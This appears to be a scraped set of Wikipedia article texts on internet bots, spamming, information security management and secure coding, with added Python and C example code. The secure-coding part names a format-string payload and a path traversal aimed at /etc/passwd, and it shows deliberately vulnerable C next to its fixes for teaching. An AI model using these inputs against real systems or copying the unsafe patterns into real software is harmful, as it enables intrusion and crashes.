become an influencing factor in the development of artificial intelligence and social bots. And as information and thought spread en masse across social media websites, innovative technological advancements follow the same pattern.
Reports of political interference in recent elections, including the 2016 US and 2017 UK general elections, 5 have raised the notion that bots are more prevalent because of the ethical questions that arise between the bot's design and the bot's designer. Emilio Ferrara, a computer scientist from the University of Southern California reporting in Communications of the ACM, 6 said the lack of resources available to implement fact-checking and information verification results in the large volumes of false reports and claims made about these bots on social media platforms. In the case of Twitter, most of these bots are programmed with search filter capabilities that target keywords and phrases favoring political agendas and then retweet them. While bots are programmed to spread unverified information throughout social media platforms, 7 this is a challenge that programmers face in the wake of a hostile political climate. The "Bot Effect" is what Ferrara reported as the socialization of bots and human users creating a vulnerability to the leaking of personal information and polarizing influences outside the ethics of the bot's code; it was confirmed by Guillory Kramer in his study, where he observed the behavior of emotionally volatile users and the impact the bots have on them, altering their perception of reality. There has been a great deal of controversy about the use of bots in an automated trading function. Auction website eBay took legal action in an attempt to suppress a third-party company from using bots to look for bargains on its site; this approach backfired on eBay and attracted the attention of further bots. The United Kingdom-based bet exchange, Betfair, saw such a large amount of traffic coming from bots that it launched a WebService API aimed at bot programmers, through which it can actively manage bot interactions. Bot farms are known to be used in online app stores, like the Apple App Store and Google Play, to manipulate positions 8 or increase positive ratings/reviews. 9 A rapidly growing, benign form of internet bot is the chatbot. From 2016, when Facebook Messenger allowed developers to place chatbots on their platform, there has been an exponential growth of their use on that app alone. 30,000 bots were created for Messenger in the first six months, rising to 100,000 by September 2017. 10 Avi Ben Ezra, CTO of SnatchBot, told Forbes that evidence from the use of their chatbot building platform pointed to a near future saving of millions of hours of human labor as 'live chat' on websites was replaced with bots. 11 Companies use internet bots to increase online engagement and streamline communication. Companies often use bots to cut down on cost; instead of employing people to communicate with consumers, companies have developed new ways to be efficient. These chatbots are used to answer customers' questions: for example, Domino's developed a chatbot that can take orders via Facebook Messenger. Chatbots allow companies to allocate their employees' time to other tasks. 12 One example of the malicious use of bots is the coordination and operation of an automated attack on networked computers, such as a denial-of-service attack by a botnet. Internet bots or web bots can also be used to commit click fraud and more recently have appeared around MMORPG games as computer game bots.
Another category is represented by spambots, internet bots that attempt to spam large amounts of content on the Internet, usually adding advertising links. More than 94.2% of websites have experienced a bot attack. 3 Malicious bots (and botnets) come in several types. In 2012, journalist Percy von Lipinski reported that he discovered millions of bot-generated ("botted" or "pinged") views at CNN iReport. CNN iReport quietly removed millions of views from the account of iReporter Chris Morrow. 19 It is not known if the ad revenue received by CNN from the fake views was ever returned to the advertisers. The most widely used anti-bot technique is the use of CAPTCHA. Examples of providers include reCAPTCHA, Minteye, Solve Media and NuCaptcha. However, CAPTCHAs are not foolproof in preventing bots, as they can often be circumvented by computer character recognition, security holes, and outsourcing CAPTCHA solving to cheap laborers. There are two main concerns with bots: clarity and face-to-face support. The cultural background of human beings affects the way they communicate with social bots. Many people believe that bots are vastly less intelligent than humans and so they are not worthy of our respect. 2 Min-Sun Kim proposed five concerns or issues that may arise when communicating with a social robot: avoiding damage to people's feelings, minimizing impositions, avoiding disapproval from others, clarity issues, and how effectively their messages come across. 2 People who oppose social robots argue that they also take away from the genuine creation of human relationships. 2 |
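The robots.txt convention described at the start of this article can be honoured programmatically; Python's standard-library urllib.robotparser does this, as sketched below with a placeholder site and a hypothetical user-agent string.

from urllib.robotparser import RobotFileParser

robots_url = "https://example.com/robots.txt"   # placeholder site
parser = RobotFileParser()
parser.set_url(robots_url)
parser.read()                                    # fetches and parses the rules

user_agent = "example-research-bot"              # hypothetical bot name
for path in ("/", "/private/reports"):
    allowed = parser.can_fetch(user_agent, f"https://example.com{path}")
    print(f"{user_agent} may fetch {path}: {allowed}")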
487 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Spamming | Spamming is the use of messaging systems to send multiple unsolicited messages (spam) to large numbers of recipients for the purpose of commercial advertising, non-commercial proselytizing, or any prohibited purpose (especially phishing), or simply repeatedly sending the same message to the same user. While the most widely recognized form of spam is email spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, online classified ads spam, mobile phone messaging spam, Internet forum spam, junk fax transmissions, social spam, spam mobile apps, 1 television advertising and file sharing spam. It is named after Spam, a luncheon meat, by way of a Monty Python sketch about a restaurant that has Spam in almost every dish and in which Vikings annoyingly sing "Spam" repeatedly. 2 Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, servers, infrastructures, IP ranges, and domain names, and it is difficult to hold senders accountable for their mass mailings. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have added extra capacity to cope with the volume. Spamming has been the subject of legislation in many jurisdictions. 3 A person who creates spam is called a spammer. 4 The term spam is derived from the 1970 "Spam" sketch of the BBC sketch comedy television series Monty Python's Flying Circus. 5 6 The sketch, set in a cafe, has a waitress reading out a menu where every item but one includes the Spam canned luncheon meat. As the waitress recites the Spam-filled menu, a chorus of Viking patrons drown out all conversations with a song, repeating "Spam, Spam, Spam, Spam… Lovely Spam! Wonderful Spam!". 7 In the 1980s the term was adopted to describe certain abusive users who frequented BBSs and MUDs, who would repeat "Spam" a huge number of times to scroll other users' text off the screen. 8 In early chat-room services like PeopleLink and the early days of Online America (later known as America Online or AOL), they actually flooded the screen with quotes from the Monty Python sketch. This was used as a tactic by insiders of a group that wanted to drive newcomers out of the room so the usual conversation could continue. It was also used to prevent members of rival groups from chatting—for instance, Star Wars fans often invaded Star Trek chat rooms, filling the space with blocks of text until the Star Trek fans left. 9 It later came to be used on Usenet to mean excessive multiple posting—the repeated posting of the same message. The unwanted message would appear in many, if not all, newsgroups, just as Spam appeared in all the menu items in the Monty Python sketch. One of the earliest people to use "spam" in this sense was Joel Furr. 10 11 This use had also become established—to "spam" Usenet was to flood newsgroups with junk messages. The word was also attributed to the flood of "Make Money Fast" messages that clogged many newsgroups during the 1990s. In 1998, the New Oxford Dictionary of English, which had previously only defined "spam" in relation to the trademarked food product, added a second definition to its entry for "spam": "Irrelevant or inappropriate messages sent on the Internet to a large number of newsgroups or users."
There was also an effort to differentiate between types of newsgroup spam. Messages that were crossposted to too many newsgroups at once, as opposed to those that were posted too frequently, were called "velveeta" (after a cheese product), but this term did not persist. 12 In the late 19th century, Western Union allowed telegraphic messages on its network to be sent to multiple destinations. The first recorded instance of a mass unsolicited commercial telegram is from May 1864, when some British politicians received an unsolicited telegram advertising a dentist. 13 The earliest documented spam (although the term had not yet been coined 14 ) was a message advertising the availability of a new model of Digital Equipment Corporation computers sent by Gary Thuerk to 393 recipients on ARPANET on May 3, 1978. 10 Rather than send a separate message to each person, which was the standard practice at the time, he had an assistant, Carl Gartley, write a single mass email. Reaction from the net community was fiercely negative, but the spam did generate some sales. 15 16 Spamming had been practiced as a prank by participants in multi-user dungeon games, to fill their rivals' accounts with unwanted electronic junk. 16 The first major commercial spam incident started on March 5, 1994, when a husband and wife team of lawyers, Laurence Canter and Martha Siegel, began using bulk Usenet posting to advertise immigration law services. The incident was commonly termed the "Green Card spam", after the subject line of the postings. Defiant in the face of widespread condemnation, the attorneys claimed their detractors were hypocrites or "zealots", claimed they had a free speech right to send unwanted commercial messages, and labeled their opponents "anti-commerce radicals". The couple wrote a controversial book entitled How to Make a Fortune on the Information Superhighway. 16 An early example of nonprofit fundraising bulk posting via Usenet also occurred in 1994 on behalf of CitiHope, an NGO attempting to raise funds to rescue children at risk during the Bosnian War. However, as it was a violation of their terms of service, the ISP Panix deleted all of the bulk posts from Usenet, only missing three copies citation needed . Within a few years, the focus of spamming (and anti-spam efforts) moved chiefly to email, where it remains today. 8 By 1999, Khan C. Smith, a well known hacker at the time, had begun to commercialize the bulk email industry and rallied thousands into the business by building more friendly bulk email software and providing internet access illegally hacked from major ISPs such as Earthlink and Botnets. 17 By 2009 the majority of spam sent around the World was in the English language; spammers began using automatic translation services to send spam in other languages. 18 Email spam, also known as unsolicited bulk email (UBE), or junk mail, is the practice of sending unwanted email messages, frequently with commercial content, in large quantities. 19 Spam in email started to become a problem when the Internet was opened for commercial use in the mid 1990s. It grew exponentially over the following years, and by 2007 it constituted about 80% to 85% of all e-mail, by a conservative estimate. 20 Pressure to make email spam illegal has resulted in legislation in some jurisdictions, but less so in others. The efforts taken by governing bodies, security systems and email service providers seem to be helping to reduce the volume of email spam. 
According to "2014 Internet Security Threat Report, Volume 19" published by Symantec Corporation, spam volume dropped to 66% of all email traffic. 21 An industry of email address harvesting is dedicated to collecting email addresses and selling compiled databases. 22 Some of these address-harvesting approaches rely on users not reading the fine print of agreements, resulting in their agreeing to send messages indiscriminately to their contacts. This is a common approach in social networking spam such as that generated by the social networking site Quechup. 23 Instant messaging spam makes use of instant messaging systems. Although less prevalent than its e-mail counterpart, according to a report from Ferris Research, 500 million spam IMs were sent in 2003, twice the level of 2002. 24 Newsgroup spam is a type of spam where the targets are Usenet newsgroups. Spamming of Usenet newsgroups actually pre-dates e-mail spam. Usenet convention defines spamming as excessive multiple posting, that is, the repeated posting of a message (or substantially similar messages). The prevalence of Usenet spam led to the development of the Breidbart Index as an objective measure of a message's "spamminess". Forum spam is the creation of advertising messages on Internet forums. It is generally done by automated spambots. Most forum spam consists of links to external sites, with the dual goals of increasing search engine visibility in highly competitive areas such as weight loss, pharmaceuticals, gambling, pornography, real estate or loans, and generating more traffic for these commercial websites. Some of these links contain code to track the spambot's identity; if a sale goes through, the spammer behind the spambot earns a commission. Mobile phone spam is directed at the text messaging service of a mobile phone. This can be especially irritating to customers not only for the inconvenience, but also because of the fee they may be charged per text message received in some markets. To comply with CAN-SPAM regulations in the US, SMS messages now must provide options of HELP and STOP, the latter to end communication with the advertiser via SMS altogether. Despite the high number of phone users, there has not been so much phone spam, because there is a charge for sending SMS. Recently, there are also observations of mobile phone spam delivered via browser push notifications. These can be a result of allowing websites which are malicious or delivering malicious ads to send a user notifications. 25 Facebook and Twitter are not immune to messages containing spam links. Spammers hack into accounts and send false links under the guise of a user's trusted contacts such as friends and family. 26 As for Twitter, spammers gain credibility by following verified accounts such as that of Lady Gaga; when that account owner follows the spammer back, it legitimizes the spammer. 27 Twitter has studied what interest structures allow their users to receive interesting tweets and avoid spam, despite the site using the broadcast model, in which all tweets from a user are broadcast to all followers of the user. 28 Spammers, out of malicious intent, post either unwanted (or irrelevant) information or spread misinformation on social media platforms. 29 Spreading beyond the centrally managed social networking platforms, user-generated content increasingly appears on business, government, and nonprofit websites worldwide. Fake accounts and comments planted by computers programmed to issue social spam can infiltrate these websites. 
30 Blog spam is spamming on weblogs. In 2003, this type of spam took advantage of the open nature of comments in the blogging software Movable Type by repeatedly placing comments to various blog posts that provided nothing more than a link to the spammer's commercial web site. 31 Similar attacks are often performed against wikis and guestbooks, both of which accept user contributions. Another possible form of spam in blogs is the spamming of a certain tag on websites such as Tumblr. In actual video spam, the uploaded video is given a name and description with a popular figure or event that is likely to draw attention, or within the video a certain image is timed to come up as the video's thumbnail image to mislead the viewer, such as a still image from a feature film, purporting to be a part-by-part piece of a movie being pirated, e.g. Big Buck Bunny Full Movie Online - Part 1 10 HD, a link to a supposed keygen, trainer, ISO file for a video game, or something similar. The actual content of the video ends up being totally unrelated, a Rickroll, offensive, or simply on-screen text of a link to the site being promoted. 32 In some cases, the link in question may lead to an online survey site, a password-protected archive file with instructions leading to the aforementioned survey (though the survey, and the archive file itself, is worthless and does not contain the file in question at all), or in extreme cases, malware. 33 Others may upload videos presented in an infomercial-like format selling their product which feature actors and paid testimonials, though the promoted product or service is of dubious quality and would likely not pass the scrutiny of a standards and practices department at a television station or cable network. VoIP spam is VoIP (Voice over Internet Protocol) spam, usually using SIP (Session Initiation Protocol). This is nearly identical to telemarketing calls over traditional phone lines. When the user chooses to receive the spam call, a pre-recorded spam message or advertisement is usually played back. This is generally easier for the spammer as VoIP services are cheap and easy to anonymize over the Internet, and there are many options for sending mass number of calls from a single location. Accounts or IP addresses being used for VoIP spam can usually be identified by a large number of outgoing calls, low call completion and short call length. Academic search engines enable researchers to find academic literature and are used to obtain citation data for calculating author-level metrics. Researchers from the University of California, Berkeley and OvGU demonstrated that most (web-based) academic search engines, especially Google Scholar are not capable of identifying spam attacks. 34 The researchers manipulated the citation counts of articles, and managed to make Google Scholar index complete fake articles, some containing advertising. 34 Spamming in mobile app stores include (i) apps that were automatically generated and as a result do not have any specific functionality or a meaningful description; (ii) multiple instances of the same app being published to obtain increased visibility in the app market; and (iii) apps that make excessive use of unrelated keywords to attract users through unintended searches. 35 Bluespam, or the action of sending spam to Bluetooth-enabled devices, is another form of spam that has developed in recent years. 36 E-mail and other forms of spamming have been used for purposes other than advertisements. 
Many early Usenet spams were religious or political. Serdar Argic, for instance, spammed Usenet with historical revisionist screeds. A number of evangelists have spammed Usenet and e-mail media with preaching messages. A growing number of criminals are also using spam to perpetrate various sorts of fraud. a In 2011 the origins of spam were analyzed by Cisco Systems. They provided a report that shows spam volume originating from countries worldwide. 37 Hormel Foods Corporation, the maker of SPAM luncheon meat, does not object to the Internet use of the term "spamming". However, they did ask that the capitalized word "Spam" be reserved to refer to their product and trademark. 38 The European Union's Internal Market Commission estimated in 2001 that "junk email" cost Internet users €10 billion per year worldwide. 39 The California legislature found that spam cost United States organizations alone more than $13 billion in 2007, including lost productivity and the additional equipment, software, and manpower needed to combat the problem. 40 Spam's direct effects include the consumption of computer and network resources, and the cost in human time and attention of dismissing unwanted messages. 41 Large companies that are frequent spam targets utilize numerous techniques to detect and prevent spam. 42 The cost to providers of search engines is significant: "The secondary consequence of spamming is that search engine indexes are inundated with useless pages, increasing the cost of each processed query". 4 The costs of spam also include the collateral costs of the struggle between spammers and the administrators and users of the media threatened by spamming. 43 Email spam exemplifies a tragedy of the commons: spammers use resources (both physical and human), without bearing the entire cost of those resources. In fact, spammers commonly do not bear the cost at all. This raises the costs for everyone. 44 In some ways spam is even a potential threat to the entire email system, as operated in the past. Since email is so cheap to send, a tiny number of spammers can saturate the Internet with junk mail. Although only a tiny percentage of their targets are motivated to purchase their products (or fall victim to their scams), the low cost may provide a sufficient conversion rate to keep the spamming alive. Furthermore, even though spam appears not to be economically viable as a way for a reputable company to do business, it suffices for professional spammers to convince a tiny proportion of gullible advertisers that it is viable for those spammers to stay in business. Finally, new spammers go into business every day, and the low costs allow a single spammer to do a lot of harm before finally realizing that the business is not profitable. Some companies and groups "rank" spammers; spammers who make the news are sometimes referred to by these rankings. 45 46 In all cases listed above, including both commercial and non-commercial, "spam happens" because of a positive cost-benefit analysis result; if the cost to recipients is excluded as an externality, the spammer can avoid paying. Cost is the combination of several factors, such as overhead, transaction costs, and risk; benefit is the total expected profit from spam, which may include any combination of the commercial and non-commercial reasons listed above. It is normally linear, based on the incremental benefit of reaching each additional spam recipient, combined with the conversion rate.
The conversion rate for botnet-generated spam has recently been measured to be around one in 12,000,000 for pharmaceutical spam and one in 200,000 for infection sites as used by the Storm botnet. 47 The authors of the study calculating those conversion rates noted, "After 26 days, and almost 350 million e-mail messages, only 28 sales resulted." Spam can be used to spread computer viruses, trojan horses or other malicious software. The objective may be identity theft, or worse (e.g., advance fee fraud). Some spam attempts to capitalize on human greed, while some attempts to take advantage of the victims' inexperience with computer technology to trick them (e.g., phishing). One of the world's most prolific spammers, Robert Alan Soloway, was arrested by US authorities on May 31, 2007. 48 Described as one of the top ten spammers in the world, Soloway was charged with 35 criminal counts, including mail fraud, wire fraud, e-mail fraud, aggravated identity theft, and money laundering. 48 Prosecutors allege that Soloway used millions of "zombie" computers to distribute spam during 2003. 49 This is the first case in which US prosecutors used identity theft laws to prosecute a spammer for taking over someone else's Internet domain name. 50 In an attempt to assess potential legal and technical strategies for stopping illegal spam, a study cataloged three months of online spam data and researched website naming and hosting infrastructures. The study concluded that: 1) half of all spam programs have their domains and servers distributed over just eight percent or fewer of the total available hosting registrars and autonomous systems, with 80 percent of spam programs overall being distributed over just 20 percent of all registrars and autonomous systems; 2) of the 76 purchases for which the researchers received transaction information, there were only 13 distinct banks acting as credit card acquirers and only three banks provided the payment servicing for 95 percent of the spam-advertised goods in the study; and, 3) a "financial blacklist" of banking entities that do business with spammers would dramatically reduce monetization of unwanted e-mails. Moreover, this blacklist could be updated far more rapidly than spammers could acquire new banking resources, an asymmetry favoring anti-spam efforts. 51 An ongoing concern expressed by parties such as the Electronic Frontier Foundation and the American Civil Liberties Union has to do with so-called "stealth blocking", a term for ISPs employing aggressive spam blocking without their users' knowledge. These groups' concern is that ISPs or technicians seeking to reduce spam-related costs may select tools that (either through error or design) also block non-spam e-mail from sites seen as "spam-friendly". Few object to the existence of these tools; it is their use in filtering the mail of users who are not informed of their use that draws fire. 52 Even though it is possible in some jurisdictions to treat some spam as unlawful merely by applying existing laws against trespass and conversion, some laws specifically targeting spam have been proposed. In 2004, the United States passed the CAN-SPAM Act of 2003, which provided ISPs with tools to combat spam. This act allowed Yahoo! to successfully sue Eric Head, who settled the lawsuit for several thousand U.S. dollars in June 2004. But the law is criticized by many for not being effective enough. 
Indeed, the law was supported by some spammers and organizations that support spamming, and opposed by many in the anti-spam community. Earthlink won a $25 million judgment against one of the most notorious and active "spammers", Khan C. Smith, in 2001 for his role in founding the modern spam industry, which dealt billions in economic damage and brought thousands of spammers into the industry. 53 His email efforts were said to make up more than a third of all Internet email being sent from 1999 until 2002. Sanford Wallace and Cyber Promotions were the target of a string of lawsuits, many of which were settled out of court, up through a 1998 Earthlink settlement 54 that put Cyber Promotions out of business. Attorney Laurence Canter was disbarred by the Tennessee Supreme Court in 1997 for sending prodigious amounts of spam advertising his immigration law practice. In 2005, Jason Smathers, a former America Online employee, pleaded guilty to charges of violating the CAN-SPAM Act. In 2003, he sold a list of approximately 93 million AOL subscriber e-mail addresses to Sean Dunaway, who sold the list to spammers. 55 56 In 2007, Robert Soloway lost a case in a federal court against the operator of a small Oklahoma-based Internet service provider who accused him of spamming. U.S. Judge Ralph G. Thompson granted a motion by plaintiff Robert Braver for a default judgment and permanent injunction against him. The judgment includes a statutory damages award of about $10 million under Oklahoma law. 57 In June 2007, two men were convicted of eight counts stemming from sending millions of e-mail spam messages that included hardcore pornographic images. Jeffrey A. Kilbride, 41, of Venice, California, was sentenced to six years in prison, and James R. Schaffer, 41, of Paradise Valley, Arizona, was sentenced to 63 months. In addition, the two were fined $100,000, ordered to pay $77,500 in restitution to AOL, and ordered to forfeit more than $1.1 million, the amount of illegal proceeds from their spamming operation. 58 The charges included conspiracy, fraud, money laundering, and transportation of obscene materials. The trial, which began on June 5, was the first to include charges under the CAN-SPAM Act of 2003, according to a release from the Department of Justice. The specific law that prosecutors used under the CAN-SPAM Act was designed to crack down on the transmission of pornography in spam. 59 In 2005, Scott J. Filary and Donald E. Townsend of Tampa, Florida, were sued by Florida Attorney General Charlie Crist for violating the Florida Electronic Mail Communications Act. 60 The two spammers were required to pay $50,000 to cover the costs of investigation by the state of Florida, and a $1.1 million penalty if spamming were to continue, if the $50,000 was not paid, or if the financial statements provided were found to be inaccurate. The spamming operation was successfully shut down. 61 Edna Fiedler of Olympia, Washington, on June 25, 2008, pleaded guilty in a Tacoma court and was sentenced to two years' imprisonment and five years of supervised release or probation for her role in a $1 million Internet "Nigerian check scam". She conspired to commit bank, wire and mail fraud against US citizens, specifically using the Internet, and had an accomplice who shipped counterfeit checks and money orders to her from Lagos, Nigeria, the previous November. Fiedler had shipped out $609,000 in fake checks and money orders when arrested and was preparing to send an additional $1.1 million in counterfeit materials. Also, the U.S. 
Postal Service recently intercepted counterfeit checks, lottery tickets and eBay overpayment schemes with a value of $2.1 billion. 62 63 In a 2009 opinion, Gordon v. Virtumundo, Inc., 575 F.3d 1040, the Ninth Circuit assessed the standing requirements necessary for a private plaintiff to bring a civil cause of action against spam senders under the CAN-SPAM Act of 2003, as well as the scope of the CAN-SPAM Act's federal preemption clause. 64 In the first successful case of its kind, Nigel Roberts from the Channel Islands won £270 against Media Logistics UK, which had sent junk e-mails to his personal account. 65 In January 2007, a Sheriff Court in Scotland awarded Mr. Gordon Dick £750 (the then maximum sum that could be awarded in a Small Claim action) plus expenses of £618.66, a total of £1,368.66, against Transcom Internet Services Ltd. 66 for breaching anti-spam laws. 67 Transcom had been legally represented at earlier hearings, but were not represented at the proof, so Gordon Dick got his decree by default. It is the largest amount awarded in compensation in the United Kingdom since the Roberts v Media Logistics case in 2005. Despite the statutory tort that is created by the Regulations implementing the EC Directive, few other people have followed their example. As the Courts engage in active case management, such cases would probably now be expected to be settled by mediation and payment of nominal damages. In October 2008, an international internet spam operation run from New Zealand was cited by American authorities as one of the world's largest, and for a time responsible for up to a third of all unwanted e-mails. In a statement the US Federal Trade Commission (FTC) named Christchurch's Lance Atkinson as one of the principals of the operation. New Zealand's Internal Affairs announced it had lodged a $200,000 claim in the High Court against Atkinson and his brother Shane Atkinson and courier Roland Smits, after raids in Christchurch. This marked the first prosecution since the Unsolicited Electronic Messages Act (UEMA) was passed in September 2007. The FTC said it had received more than three million complaints about spam messages connected to this operation, and estimated that it may be responsible for sending billions of illegal spam messages. The US District Court froze the defendants' assets to preserve them for consumer redress pending trial. 68 U.S. co-defendant Jody Smith forfeited more than $800,000 and faces up to five years in prison for charges to which he pleaded guilty. 69 While most countries either outlaw or at least ignore spam, Bulgaria is the first and only country to legalize it. 70 According to the Bulgarian E-Commerce Act, 71 anyone can send spam to mailboxes published as owned by a company or organization, as long as there is a "clear and straight indication that the message is unsolicited commercial e-mail" in the message body. This made lawsuits against Bulgarian ISPs and public e-mail providers with antispam policies possible, as they are obstructing legal commerce activity and thus violate Bulgarian antitrust acts. While no such lawsuits have been brought so far, several cases of spam obstruction are currently awaiting decision in the Bulgarian Antitrust Commission and could end with serious fines for the ISPs in question. The law contains other dubious provisions — for example, the creation of a nationwide public electronic register of e-mail addresses that do not want to receive spam. 
72 It is usually abused as the perfect source for e-mail address harvesting, because publishing invalid or incorrect information in such a register is a criminal offense in Bulgaria. |
488 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_security_management | Information security management (ISM) defines and manages controls that an organization needs to implement to ensure that it is sensibly protecting the confidentiality, availability, and integrity of assets from threats and vulnerabilities. The core of ISM includes information risk management, a process that involves the assessment of the risks an organization must deal with in the management and protection of assets, as well as the dissemination of the risks to all appropriate stakeholders. 1 This requires proper asset identification and valuation steps, including evaluating the value of confidentiality, integrity, availability, and replacement of assets. 2 As part of information security management, an organization may implement an information security management system and other best practices found in the ISO/IEC 27001, ISO/IEC 27002, and ISO/IEC 27035 standards on information security. 3 4 Managing information security in essence means managing and mitigating the various threats and vulnerabilities to assets, while at the same time balancing the management effort expended on potential threats and vulnerabilities by gauging the probability of them actually occurring. 1 5 6 A meteorite crashing into a server room is certainly a threat, for example, but an information security officer will likely put little effort into preparing for such a threat, just as people do not have to start preparing for the end of the world merely because a global seed bank exists. 7 After appropriate asset identification and valuation have occurred, 2 risk management and mitigation of risks to those assets involves the analysis of the following issues: 5 6 8 Once a threat and/or vulnerability has been identified and assessed as having sufficient impact/likelihood on information assets, a mitigation plan can be enacted. The mitigation method chosen largely depends on which of the seven information technology (IT) domains the threat and/or vulnerability resides in. The threat of user apathy toward security policies (the user domain) will require a much different mitigation plan than the one used to limit the threat of unauthorized probing and scanning of a network (the LAN-to-WAN domain). 8 An information security management system (ISMS) represents the collation of all the interrelated and interacting information security elements of an organization, so as to ensure policies, procedures, and objectives can be created, implemented, communicated, and evaluated to better guarantee the organization's overall information security. This system is typically influenced by an organization's needs, objectives, security requirements, size, and processes. 9 An ISMS includes and lends itself to risk management and mitigation strategies. Additionally, an organization's adoption of an ISMS indicates that it is systematically identifying, assessing, and managing information security risks and "will be capable of successfully addressing information confidentiality, integrity, and availability requirements." 10 However, the human factors associated with ISMS development, implementation, and practice (the user domain 8 ) must also be considered to best ensure the ISMS' ultimate success. 
11 Implementing effective information security management (including risk management and mitigation) requires a management strategy that takes note of the following: 12 Without sufficient budgetary considerations for all the above—in addition to the money allotted to standard regulatory, IT, privacy, and security issues—an information security management plan/system cannot fully succeed. Standards that are available to assist organizations with implementing the appropriate programs and controls to mitigate threats and vulnerabilities include the ISO/IEC 27000 family of standards, the ITIL framework, the COBIT framework, and O-ISM3 2.0. The ISO/IEC 27000 family represents some of the most well-known standards governing information security management, and its ISMS guidance is based on global expert opinion. The standards lay out the requirements for best "establishing, implementing, deploying, monitoring, reviewing, maintaining, updating, and improving information security management systems." 3 4 ITIL acts as a collection of concepts, policies, and best practices for the effective management of information technology infrastructure, service, and security, differing from ISO/IEC 27001 in only a few ways. 13 14 COBIT, developed by ISACA, is a framework for helping information security personnel develop and implement strategies for information management and governance while minimizing negative impacts and controlling information security and risk management, 4 13 15 and O-ISM3 2.0 is The Open Group's technology-neutral information security model for enterprise. 16 |
489 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Secure_coding | Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. 1 Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment. 2 Some scholars have suggested that in order to effectively confront threats related to cybersecurity, proper security should be coded or “baked in” to the systems. With security designed into the software, this ensures that there will be protection against insider attacks and reduces the threat to application security. 3 Buffer overflows, a common software security vulnerability, happen when a process tries to store data beyond a fixed-length buffer. For example, if there are 8 slots to store items in, there will be a problem if there is an attempt to store 9 items. In computer memory the overflowed data may overwrite data in the next location, which can result in a security vulnerability (stack smashing) or program termination (segmentation fault). 1 A typical example is a C program that copies user input into a fixed-size buffer with strcpy (a reconstruction of this listing is sketched at the end of this entry): if the user input is larger than the destination buffer, a buffer overflow will occur. To fix this unsafe program, use strncpy to prevent a possible buffer overflow. Another secure alternative is to dynamically allocate memory on the heap using malloc; in that variant, the program attempts to copy the contents of src into dst while also checking the return value of malloc to ensure that enough memory was able to be allocated for the destination buffer. A format string attack occurs when a malicious user supplies specific inputs that will eventually be entered as an argument to a function that performs formatting, such as printf(). The attack involves the adversary reading from or writing to the stack. The C printf function writes output to stdout. If the parameter of the printf function is not properly formatted, several security bugs can be introduced. A program that passes user input directly to printf as the format string is vulnerable to a format string attack (also sketched at the end of this entry). A malicious argument passed to such a program could be "%s%s%s%s%s%s%s", which can crash the program through improper memory reads. Integer overflow occurs when an arithmetic operation results in an integer too large to be represented within the available space. A program which does not properly check for integer overflow introduces potential software bugs and exploits. Consider a function in C which attempts to confirm that the sum of x and y is less than or equal to a defined value MAX: the problem with the naive version is that it does not check for integer overflow on the addition operation. If the sum of x and y is greater than the maximum possible value of an unsigned int, the addition operation will overflow and perhaps result in a value less than or equal to MAX, even though the sum of x and y is greater than MAX. Below is a function which checks for overflow by confirming the sum is greater than or equal to both x and y. 
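The code listing that originally accompanied this passage did not survive the scrape, so here is a minimal sketch, assuming the usual textbook form of the example: a naive check that an unsigned sum stays within MAX, followed by the corrected check just described. The function names and the value of MAX are illustrative and not taken from the source.

#include <stdbool.h>

#define MAX 1024u  /* illustrative limit, not from the source */

/* Naive version: if x + y wraps past the largest unsigned int, the
 * wrapped sum can be <= MAX even though the true sum is far larger. */
bool sum_within_max_naive(unsigned int x, unsigned int y)
{
    unsigned int sum = x + y;   /* may silently overflow */
    return sum <= MAX;
}

/* Checked version: unsigned overflow wraps around, so an overflowed
 * sum is smaller than either operand; detect that before comparing. */
bool sum_within_max_checked(unsigned int x, unsigned int y)
{
    unsigned int sum = x + y;
    if (sum < x || sum < y)     /* wraparound occurred */
        return false;
    return sum <= MAX;
}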
If the sum did overflow, the sum would be less than x or less than y. Path traversal is a vulnerability whereby paths provided from an untrusted source are interpreted in such a way that unauthorised file access is possible. For example, consider a script that fetches an article by taking a filename, which is then read by the script and parsed. Such a script might use a hypothetical URL with a filename parameter to retrieve an article about dog food; if the script has no input checking, instead trusting that the filename is always valid, a malicious user could forge a URL whose filename parameter contains traversal sequences such as ../ in order to retrieve configuration files from the web server. Depending on the script, this may expose the /etc/passwd file, which on Unix-like systems contains (among others) user IDs, their login names, home directory paths and shells. (See SQL injection for a similar attack.) |
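The C listings referenced earlier in this entry (the strcpy-based buffer overflow, its strncpy and malloc fixes, and the vulnerable printf call) were also lost in scraping. The sketch below reconstructs them on the assumption that the originals followed the standard textbook pattern; the buffer size and names such as dst and BUFSIZE are illustrative, not from the source.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSIZE 16  /* illustrative fixed buffer size */

/* Unsafe: strcpy copies until the terminating NUL with no length
 * check, so input longer than BUFSIZE-1 overflows dst. */
void copy_unsafe(const char *input)
{
    char dst[BUFSIZE];
    strcpy(dst, input);               /* possible buffer overflow */
    printf("%s\n", dst);
}

/* Safer: strncpy bounds the copy; terminate explicitly because
 * strncpy does not NUL-terminate a truncated string. */
void copy_bounded(const char *input)
{
    char dst[BUFSIZE];
    strncpy(dst, input, BUFSIZE - 1);
    dst[BUFSIZE - 1] = '\0';
    printf("%s\n", dst);
}

/* Alternative: size the destination on the heap from the input,
 * checking that malloc actually returned memory. */
void copy_heap(const char *input)
{
    size_t len = strlen(input) + 1;
    char *dst = malloc(len);
    if (dst == NULL)
        return;                       /* allocation failed */
    memcpy(dst, input, len);
    printf("%s\n", dst);
    free(dst);
}

/* Format string bug: passing untrusted input as the format string
 * lets an argument such as "%s%s%s%s%s%s%s" read arbitrary stack
 * memory and crash the program. */
void print_unsafe(const char *input)
{
    printf(input);                    /* vulnerable */
}

void print_safe(const char *input)
{
    printf("%s", input);              /* input treated as data */
}

Modern compilers will typically warn about the unsafe format-string variant (for example via -Wformat-security in GCC and Clang), which is itself a useful first line of defence.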
